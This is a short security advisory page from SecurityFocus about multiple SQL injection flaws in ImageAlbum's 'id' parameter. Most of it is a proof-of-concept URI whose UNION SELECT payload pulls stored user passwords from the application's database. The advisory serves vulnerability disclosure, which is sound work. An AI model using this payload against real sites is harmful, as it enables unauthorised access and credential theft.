Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

ImageAlbum 'id' Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URI is available.

http://www.example.com/index.php/[domain]/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /*







 

Privacy Statement
Copyright 2008, SecurityFocus